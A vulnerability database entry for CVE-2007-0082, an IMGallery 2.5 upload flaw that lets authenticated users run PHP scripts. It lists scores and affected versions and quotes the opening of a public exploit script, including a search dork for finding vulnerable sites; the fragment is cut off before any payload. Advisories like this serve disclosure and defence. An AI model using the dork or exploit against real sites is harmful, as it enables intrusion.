6.5
CVSSv2

CVE-2007-0082

Published: 05/01/2007 Updated: 19/10/2017
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
VMScore: 655
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

users_adm/start1.php in IMGallery 2.5 and previous versions does not properly handle files with multiple extensions, which allows remote authenticated users to upload and execute arbitrary PHP scripts.

Vulnerable Product Search on Vulmon Subscribe to Product

imgallery imgallery 2.5

imgallery imgallery 2.4

Exploits

<? //Kacper Settings $exploit_name = "IMGallery <= 25 Create Uploader Script Exploit"; $script_name = "IMGallery 25"; $script_site = "wwwimgalleryzorpl/"; $dork = '"Powered by IMGallery"'; //************************************************************** print ' ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: : ...